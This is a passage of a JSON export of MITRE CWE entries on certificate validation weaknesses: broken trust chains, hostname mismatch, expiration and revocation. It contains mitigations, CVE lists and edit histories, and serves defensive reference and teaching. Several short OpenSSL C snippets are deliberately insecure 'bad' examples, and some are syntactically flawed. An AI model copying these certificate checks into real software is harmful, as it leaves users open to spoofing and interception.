Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Background_Details, Modes_of_Introduction, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples"}],"Previous_Entry_Name":{"#text":"Certificate Issues","attr":{"@_Date":"2013-02-21"}}}},"296":{"attr":{"@_ID":"296","@_Name":"Improper Following of a Certificate\'s Chain of Trust","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not follow, or incorrectly follows, the chain of trust for a certificate back to a trusted root certificate, resulting in incorrect trust of any resource that is associated with that certificate.","Extended_Description":{"xhtml:p":["If a system does not follow the chain of trust of a certificate to a root server, the certificate loses all usefulness as a metric of trust. Essentially, the trust gained from a certificate is derived from a chain of trust -- with a reputable trusted entity at the end of that list. The end user must trust that reputable source, and this reputable source must vouch for the resource in question through the medium of the certificate.","In some cases, this trust traverses several entities who vouch for one another. The entity trusted by the end user is at one end of this trust chain, while the certificate-wielding resource is at the other end of the chain. If the user receives a certificate at the end of one of these trust chains and then proceeds to check only that the first link in the chain, no real trust has been derived, since the entire chain must be traversed back to a trusted source to verify the certificate.","There are several ways in which the chain of trust might be broken, including but not limited to:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Any certificate in the chain is self-signed, unless it the root.","Not every intermediate certificate is checked, starting from the original certificate all the way up to the root certificate.","An intermediate, CA-signed certificate does not have the expected Basic Constraints or other important extensions.","The root certificate has been compromised or authorized to the wrong party."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"295","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Implementation","Note":"When the software uses certificate pinning, the developer might not properly validate all relevant components of the certificate before pinning the certificate. This can make it difficult or expensive to test after the pinning is complete."}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":[{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"Exploitation of this flaw can lead to the trust of data that may have originated with a spoofed source."},{"Scope":["Integrity","Confidentiality","Availability","Access Control"],"Impact":["Gain Privileges or Assume Identity","Execute Unauthorized Code or Commands"],"Note":"Data, requests, or actions taken by the attacking entity can be carried out as a spoofed benign entity."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Ensure that proper certificate checking is included in the system design."},{"Phase":"Implementation","Description":"Understand, and properly implement all checks necessary to ensure the integrity of certificate trust integrity."},{"Phase":"Implementation","Description":"If certificate pinning is being used, ensure that all relevant properties of the certificate are fully validated before the certificate is pinned, including the full chain of trust."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-121"},"Intro_Text":"This code checks the certificate of a connected peer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if ((cert = SSL_get_peer_certificate(ssl)) &amp;&amp; host)if ((X509_V_OK==foo) || X509_V_ERR_SELF_SIGNED_CERT_IN_CHAIN==foo))","xhtml:div":[{"#text":"foo=SSL_get_verify_result(ssl);","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// certificate looks good, host can be trusted"}}],"xhtml:br":""}},"Body_Text":"In this case, because the certificate is self-signed, there was no external authority that could prove the identity of the host. The program could be communicating with a different system that is spoofing the host, e.g. by poisoning the DNS cache or using an Adversary-in-the-Middle (AITM) attack to modify the traffic from server to client."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2016-2402","Description":"Server allows bypass of certificate pinning by sending a chain of trust that includes a trusted CA that is not pinned.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2402"},{"Reference":"CVE-2008-4989","Description":"Verification function trusts certificate chains in which the last certificate is self-signed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4989"},{"Reference":"CVE-2012-5821","Description":"Chain: Web browser uses a TLS-related function incorrectly, preventing it from verifying that a server\'s certificate is signed by a trusted certification authority (CA).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5821"},{"Reference":"CVE-2009-3046","Description":"Web browser does not check if any intermediate certificates are revoked.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3046"},{"Reference":"CVE-2009-0265","Description":"chain: DNS server does not correctly check return value from the OpenSSL EVP_VerifyFinal function allows bypass of validation of the certificate chain.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0265"},{"Reference":"CVE-2009-0124","Description":"chain: incorrect check of return value from the OpenSSL EVP_VerifyFinal function allows bypass of validation of the certificate chain.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0124"},{"Reference":"CVE-2002-0970","Description":"File-transfer software does not validate Basic Constraints of an intermediate CA-signed certificate.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0970"},{"Reference":"CVE-2002-0862","Description":"Cryptographic API, as used in web browsers, mail clients, and other software, does not properly validate Basic Constraints.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0862"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to follow chain of trust in certificate validation"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-245"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 23: Improper Use of PKI, Especially SSL.&#34; Page 347"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Observed_Examples, Other_Notes, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Modes_of_Introduction, Observed_Examples, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Failure to Follow Chain of Trust in Certificate Validation","attr":{"@_Date":"2009-03-10"}},{"#text":"Improper Following of Chain of Trust for Certificate Validation","attr":{"@_Date":"2013-02-21"}}]}},"297":{"attr":{"@_ID":"297","@_Name":"Improper Validation of Certificate with Host Mismatch","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software communicates with a host that provides a certificate, but the software does not properly ensure that the certificate is actually associated with that host.","Extended_Description":{"xhtml:p":["Even if a certificate is well-formed, signed, and follows the chain of trust, it may simply be a valid certificate for a different site than the site that the software is interacting with. If the certificate\'s host-specific data is not properly checked - such as the Common Name (CN) in the Subject or the Subject Alternative Name (SAN) extension of an X.509 certificate - it may be possible for a redirection or spoofing attack to allow a malicious host with a valid certificate to provide data, impersonating a trusted host. In order to ensure data integrity, the certificate must be valid and it must pertain to the site that is being accessed.","Even if the software attempts to check the hostname, it is still possible to incorrectly check the hostname. For example, attackers could create a certificate with a name that begins with a trusted name followed by a NUL byte, which could cause some string-based comparisons to only examine the portion that contains the trusted name.","This weakness can occur even when the software uses Certificate Pinning, if the software does not verify the hostname at the time a certificate is pinned."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"923","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"295","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Implementation","Note":"When the software uses certificate pinning, the developer might not properly validate all relevant components of the certificate before pinning the certificate. This can make it difficult or expensive to test after the pinning is complete."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"The data read from the system vouched for by the certificate may not be from the expected system."},{"Scope":["Authentication","Other"],"Impact":"Other","Note":"Trust afforded to the system in question - based on the malicious certificate - may allow for spoofing or redirection attacks."}]},"Detection_Methods":{"Detection_Method":[{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":"Set up an untrusted endpoint (e.g. a server) with which the software will connect.  Create a test certificate that uses an invalid hostname but is signed by a trusted CA and provide this certificate from the untrusted endpoint. If the software performs any operations instead of disconnecting and reporting an error, then this indicates that the hostname is not being checked and the test certificate has been accepted."},{"Method":"Black Box","Description":"When Certificate Pinning is being used in a mobile application, consider using a tool such as Spinner [REF-955].  This methodology might be extensible to other technologies."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Fully check the hostname of the certificate and provide the user with adequate information about the nature of the problem and how to proceed."},{"Phase":"Implementation","Description":"If certificate pinning is being used, ensure that all relevant properties of the certificate are fully validated before the certificate is pinned, including the hostname."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-122"},"Intro_Text":"The following OpenSSL code obtains a certificate and verifies it.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"cert = SSL_get_peer_certificate(ssl);if (cert &amp;&amp; (SSL_get_verify_result(ssl)==X509_V_OK)) {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// do secret things"}}}},"Body_Text":"Even though the \\"verify\\" step returns X509_V_OK, this step does not include checking the Common Name against the name of the host. That is, there is no guarantee that the certificate is for the desired host. The SSL connection could have been established with a malicious host that provided a valid certificate."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2012-5810","Description":"Mobile banking application does not verify hostname, leading to financial loss.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5810"},{"Reference":"CVE-2012-5811","Description":"Mobile application for printing documents does not verify hostname, allowing attackers to read sensitive documents.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5811"},{"Reference":"CVE-2012-5807","Description":"Software for electronic checking does not verify hostname, leading to financial loss.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5807"},{"Reference":"CVE-2012-3446","Description":"Cloud-support library written in Python uses incorrect regular expression when matching hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3446"},{"Reference":"CVE-2009-2408","Description":"Web browser does not correctly handle \'\\\\0\' character (NUL) in Common Name, allowing spoofing of https sites.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2408"},{"Reference":"CVE-2012-0867","Description":"Database program truncates the Common Name during hostname verification, allowing spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0867"},{"Reference":"CVE-2010-2074","Description":"Incorrect handling of \'\\\\0\' character (NUL) in hostname verification allows spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2074"},{"Reference":"CVE-2009-4565","Description":"Mail server\'s incorrect handling of \'\\\\0\' character (NUL) in hostname verification allows spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4565"},{"Reference":"CVE-2009-3767","Description":"LDAP server\'s incorrect handling of \'\\\\0\' character (NUL) in hostname verification allows spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3767"},{"Reference":"CVE-2012-5806","Description":"Payment processing module does not verify hostname when connecting to PayPal using PHP fsockopen function.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5806"},{"Reference":"CVE-2012-2993","Description":"Smartphone device does not verify hostname, allowing spoofing of mail services.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2993"},{"Reference":"CVE-2012-5804","Description":"E-commerce module does not verify hostname when connecting to payment site.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5804"},{"Reference":"CVE-2012-5824","Description":"Chat application does not validate hostname, leading to loss of privacy.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5824"},{"Reference":"CVE-2012-5822","Description":"Application uses third-party library that does not validate hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5822"},{"Reference":"CVE-2012-5819","Description":"Cloud storage management application does not validate hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5819"},{"Reference":"CVE-2012-5817","Description":"Java library uses JSSE SSLSocket and SSLEngine classes, which do not verify the hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5817"},{"Reference":"CVE-2012-5784","Description":"SOAP platform does not verify the hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5784"},{"Reference":"CVE-2012-5782","Description":"PHP library for payments does not verify the hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5782"},{"Reference":"CVE-2012-5780","Description":"Merchant SDK for payments does not verify the hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5780"},{"Reference":"CVE-2003-0355","Description":"Web browser does not validate Common Name, allowing spoofing of https sites.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0355"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to validate host-specific certificate data"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-245"}},{"attr":{"@_External_Reference_ID":"REF-243"}},{"attr":{"@_External_Reference_ID":"REF-249"}},{"attr":{"@_External_Reference_ID":"REF-250"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 23: Improper Use of PKI, Especially SSL.&#34; Page 347"}},{"attr":{"@_External_Reference_ID":"REF-955"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Observed_Examples, References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-01-16","Modification_Comment":"Integrated mitigations and detection methods for Certificate Pinning based on feedback from the CWE Researcher List in December 2017."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Common_Consequences, Description, Detection_Factors, Modes_of_Introduction, Potential_Mitigations, References, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, References, Relationships"}],"Previous_Entry_Name":[{"#text":"Failure to Validate Host-specific Certificate Data","attr":{"@_Date":"2009-03-10"}},{"#text":"Improper Validation of Host-specific Certificate Data","attr":{"@_Date":"2013-02-21"}}]}},"298":{"attr":{"@_ID":"298","@_Name":"Improper Validation of Certificate Expiration","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A certificate expiration is not validated or is incorrectly validated, so trust may be assigned to certificates that have been abandoned due to age.","Extended_Description":"When the expiration of a certificate is not taken into account, no trust has necessarily been conveyed through it. Therefore, the validity of the certificate cannot be verified and all benefit of the certificate is lost.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"295","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"672","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Implementation","Note":"When the software uses certificate pinning, the developer might not properly validate all relevant components of the certificate before pinning the certificate. This can make it difficult or expensive to test after the pinning is complete."}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Other"],"Impact":"Other","Note":"The data read from the system vouched for by the expired certificate may be flawed due to malicious spoofing."},{"Scope":["Authentication","Other"],"Impact":"Other","Note":"Trust afforded to the system in question - based on the expired certificate - may allow for spoofing attacks."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Check for expired certificates and provide the user with adequate information about the nature of the problem and how to proceed."},{"Phase":"Implementation","Description":"If certificate pinning is being used, ensure that all relevant properties of the certificate are fully validated before the certificate is pinned, including the expiration."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-123"},"Intro_Text":"The following OpenSSL code ensures that there is a certificate and allows the use of expired certificates.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if (cert = SSL_get_peer(certificate(ssl)) {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"foo=SSL_get_verify_result(ssl);if ((X509_V_OK==foo) || (X509_V_ERR_CERT_HAS_EXPIRED==foo))","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"//do stuff"}}}}}},"Body_Text":"If the call to SSL_get_verify_result() returns X509_V_ERR_CERT_HAS_EXPIRED, this means that the certificate has expired. As time goes on, there is an increasing chance for attackers to compromise the certificate."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to validate certificate expiration"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 23: Improper Use of PKI, Especially SSL.&#34; Page 347"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Common_Consequences, Modes_of_Introduction, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Failure to Validate Certificate Expiration","attr":{"@_Date":"2009-03-10"}}}},"299":{"attr":{"@_ID":"299","@_Name":"Improper Check for Certificate Revocation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not check or incorrectly checks the revocation status of a certificate, which may cause it to use a certificate that has been compromised.","Extended_Description":"An improper check for certificate revocation is a far more serious flaw than related certificate failures. This is because the use of any revoked certificate is almost certainly malicious. The most common reason for certificate revocation is compromise of the system in question, with the result that no legitimate servers will be using a revoked certificate, unless they are sorely out of sync.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"295","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Implementation","Note":"When the software uses certificate pinning, the developer might not properly validate all relevant components of the certificate before pinning the certificate. This can make it difficult or expensive to test after the pinning is complete."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"Trust may be assigned to an entity who is not who it claims to be."},{"Scope":["Integrity","Other"],"Impact":"Other","Note":"Data from an untrusted (and possibly malicious) source may be integrated."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Data may be disclosed to an entity impersonating a trusted entity, resulting in information disclosure."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Ensure that certificates are checked for revoked status."},{"Phase":"Implementation","Description":"If certificate pinning is being used, ensure that all relevant properties of the certificate are fully validated before the certificate is pinned, including the revoked status."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-124"},"Intro_Text":"The following OpenSSL code ensures that there is a certificate before continuing execution.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if (cert = SSL_get_peer_certificate(ssl)) {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// got a certificate, do secret things"}}}},"Body_Text":"Because this code does not use SSL_get_verify_results() to check the certificate, it could accept certificates that have been revoked (X509_V_ERR_CERT_REVOKED). The software could be communicating with a malicious host."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2011-2014","Description":"LDAP-over-SSL implementation does not check Certificate Revocation List (CRL), allowing spoofing using a revoked certificate.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2014"},{"Reference":"CVE-2011-0199","Description":"Operating system does not check Certificate Revocation List (CRL) in some cases, allowing spoofing using a revoked certificate.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0199"},{"Reference":"CVE-2010-5185","Description":"Antivirus product does not check whether certificates from signed executables have been revoked.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5185"},{"Reference":"CVE-2009-3046","Description":"Web browser does not check if any intermediate certificates are revoked.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3046"},{"Reference":"CVE-2009-0161","Description":"chain: Ruby module for OCSP misinterprets a response, preventing detection of a revoked certificate.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0161"},{"Reference":"CVE-2011-2701","Description":"chain: incorrect parsing of replies from OCSP responders allows bypass using a revoked certificate.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2701"},{"Reference":"CVE-2011-0935","Description":"Router can permanently cache certain public keys, which would allow bypass if the certificate is later revoked.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0935"},{"Reference":"CVE-2009-1358","Description":"chain: OS package manager does not properly check the return value, allowing bypass using a revoked certificate.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1358"},{"Reference":"CVE-2009-0642","Description":"chain: language interpreter does not properly check the return value from an OSCP function, allowing bypass using 